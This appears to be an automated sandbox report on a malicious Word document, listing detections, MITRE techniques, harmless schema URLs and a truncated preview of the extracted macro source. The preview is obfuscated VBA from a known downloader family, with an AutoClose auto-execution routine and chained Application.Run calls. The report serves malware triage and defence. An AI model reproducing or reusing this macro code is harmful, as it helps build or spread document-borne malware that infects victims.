Verdict: MALICIOUS
Risk Score: 262
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is an OOXML document containing VBA macros; the analysis flags an Auto_Close macro and a CreateObject call. ClamAV identifies the file as 'Doc.Malware.Emooodldr-6711604-0'. The VBA script invokes other procedures via Application.Run, a technique commonly used to chain the download and execution of further malicious content. The 'Emooodldr' family name in the ClamAV detection strongly suggests the sample's identity.
Heuristics (6)
- ClamAV: Doc.Malware.Emooodldr-6711604-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
- VBA project inside OOXML (medium, 3 related findings) [OOXML_VBA]: Document contains a VBA project (VBA macros present)
- Auto_Close macro (high) [OLE_VBA_AUTOCLOSE]: Auto_Close macro
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following URLs were found in document text (OOXML body / shared strings):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11925 bytes | 912431cbe16bfd63775e4dcd9d3e9336262e1cf1e75ee5f39e3ac645bb60f95e |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 34816 bytes | d7b5413eabbf2619d9215043a897d041dfcfe1e9b4930836987efd202d7d6097 |

Detection (vbaProject_00.bin):
- ClamAV: Doc.Malware.Emooodldr-6711604-0
- Obfuscation or payload: unlikely

Preview of macros.bas (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub CvioEVkjSIoBLu()
WPvbGGkP = "TSIofYE" + "uUpLUBgANBu" + Left("DFWKLdTkGG", 9) + Left("qRIAUcZdJx", 10) + "VNWp" + "ZudVoki"
QQJXccHdV = 855.53 + 931.38 + Atn(755.77)
oORdFiYyzvTg = Atn(906) + 831.66 + Atn(715.85) + 402.53 + 235.17 + 58.77
gRSWGEqKp = "ddkFpAAzLFyZi" + Left("zOUMourEFZ", 9) + "QuHkdMZHZ" + Left("czUcnKfxvH", 2) + Left("FHIQwvndyS", 8)
Application.Run "kPOwEirFqjYrTW"
dpxbXqBj = Atn(751.67) - Atn(773.16) - 434.28 - 453.35
FccxqTjTzMA = "zdiMqvkwSYHRQNMFkQxEHWXojuqH" + LTrim("DqYQ")
doGiqNxB = "DjIHXqdpYukOj" + Left("IHKuQTUEOg", 10) + "EAwqUwBUMSoRqO" + Left("oAdERNHYPZ", 7)
cURkRGDOMRu = 990.5 - 700.29 - 932.38 - Atn(529.26) - Atn(835.44) - Atn(694.86) - 449.99 - 945.81 - 524.79
End Sub
Sub wLLxHSDKrCcPTL()
LRzNBVb = Atn(36.46) + Atn(446.1)
yMCSfAFFGLW = 170.25 + 521.32 + Atn(644.47)
Application.Run "iQnwvRGoQABoxJA"
iZDcLuqNTWOR = "Ybi" + "uUvAyGuOwAYdJ" + Left("qqFLKJBKgP", 10)
dYFUdgurbI = Atn(584.1) + Atn(553.14)
ijQCCMDjWFoI = "JdrUSnM" + "CNiwYwUrbnLrYPHFJcqQzA" + "YHIf"
QFRzAiXUB = 5.1 - 820.54 - Atn(311.94) - Atn(825.67) - 202.72
AQGAnQjgp = LTrim("EbpVPqfXiCFJEuyqBSQ") + LTrim("rrSMTJZjPxpdTCi")
End Sub
Public Function QqGfJXbAuSyVxJdYXG(DvgIoLLBXJTxrYZQuU, NIfbJuQfBYOCMMjfvg, kPqLKcOOSHMiGyLGn)
DKPzBWSGZZyZ = Atn(556.28) + Atn(394.77) + 935.68 + Atn(895.36)
JYpJcduykuI = 381.6 - 246.46 - Atn(484.99) - Atn(564.26) - Atn(454.89)
GEKXukYOCu = Atn(972.5) + 68.24 + 758.95 + Atn(8.75) + 287.74
QqGfJXbAuSyVxJdYXG = Replace(DvgIoLLBXJTxrYZQuU, NIfbJuQfBYOCMMjfvg, kPqLKcOOSHMiGyLGn)
uMJDyiPH = "vYBAMSW" + "DqGMFCOJULNxU" + "wCU" + Left("DPbKySiLJj", 2)
PnXpwuyyuPK = Left("fwRcBCIYpp", 4) + "fqY" + "gzADcwOMiq" + "ggxI"
DKYEPzOUgWfQ = RTrim("bRnvEWVLMPGjdzBEECqkH") + "oObkUIUMEqFUJQpFnRKdKybpZidAK"
iFkfinDbwTU = "oIwjNBuviNdIFJzXG" + "rOTnrVjEKFyRbAZCAPPFErdAx"
BiJvVvgJzqiB = "nicMEXHIrMAiFG" + "uRrBiExQNVWcwO" + Left("MARZbRHzZn", 7)
pBpMfSYZgTA = "CYOUzCJ" + "xfx" + Left("LHuiAWpTdM", 3) + "kDpFIgNPCnXSp" + Left("GUJZwULNYk", 6)
UiAbnYJWVnKk = "KfkNj" + Left("vIUyYMYrkC", 7) + Left("EGQDYcIfyN", 8)
CWWgVKH = RTrim("IdZOCDgMdWvQBGB") + LTrim("SIRxocxwIKZJbdzFUwSYngboyA")
SXTqWGvT = Atn(943.14) + 19.41 + Atn(494.89) + 208.55 + 506.87 + 232.81 + 730.85
TEqTpIW = 204.15 - 308.79 - 481.88 - 315.13 - Atn(906.78)
fnRknLZbD = Atn(199.12) + Atn(476.49) + 570.6 + Atn(75.55)
DoXVnAHriGfX = Atn(974.32) - Atn(566.18) - Atn(38.5) - 987.66
PiIViiTwjEO = 826.56 - Atn(919.73)
BCbKbNK = Left("DObkruKnSx", 6) + Left("yVxpwnArNF", 10) + "KocwOuACWi"
GfXuZGUWW = RTrim("jKRcSHgpcKCYwG") + "GDEgxuPrnHBVNNcgoEDCxwugA"
fYMkCVMDBK = Atn(395.83) + Atn(672.1) + 649.6 + Atn(46.98)
End Function
Sub kPOwEirFqjYrTW()
iKODWVVuoHE = 350.9 - 430.57 - 437.16 - Atn(716.35) - 109.1 - Atn(963.88)
OJrZQfLk = RTrim("DYz") + "EnoGzIMEdGNTVjEBXXQJ" + "pYgkHxjoHSQIESiGrvOSkQPI"
vvoUrEqqjYUj = 738.89 - 866.88 - 319.42 - Atn(819.87) - 581.5
zuBVNvwwN = 600.28 + 943.5 + Atn(933.18)
Application.Run "dxpcqnVIPFSpvQ"
XqwnpLqFG = RTrim("DNDSjykbr") + LTrim("WrkrDJwIqLFrpIIrgjVcUDpFo") + "kfWnwpBPT"
CQTOLQo = "ZRzEqkQ" + Left("AjdigGyVkJ", 9)
vvpCGOPXcX = "DXWQjDFuPjwKGNq" + Left("GOKnERcXXV", 6) + Left("ZWxbFjZUFT", 4) + "JWo"
QBPkJZF = 90.46 - Atn(697.61) - 785.34 - 575.51
rjGYPnpGuAZ = "KXMrAbuNjdiDq" + "OXSXfBKQ" + Left("IwJKUBubnB", 7) + "PNvc" + "Qwn"
End Sub
Sub AutoClose()
NHxfdxWgZR = "bxGzMBcnPcCVRTqbWjo" + RTrim("SozFYgwgyzIodPWoAqDYE") + "ODSFfXDGcVvNEXZvdnOpHouQ" + LTrim("bEjMwCyqFHuSgXgrXkDWHwOIY")
uPxFyRIN = "BcyOnqQVVbTIyqp" + "ZkLINWJk" + Left("QgZEBTnrDA", 8)
iXYozSvdDM = Left("JLyIvIkOXS", 6) + Left("kCiuYBcZdz", 8) + "xYbNAofDfySjU"
oEzNTogQRdOp = 207.23 - Atn(689.76) - Atn(652.87) - 317.41 - 402.72 - Atn(125.64)
VpUquKRiHgoA = "iixLrB" + Left("kkAVAYxnii", 9
... (truncated)
```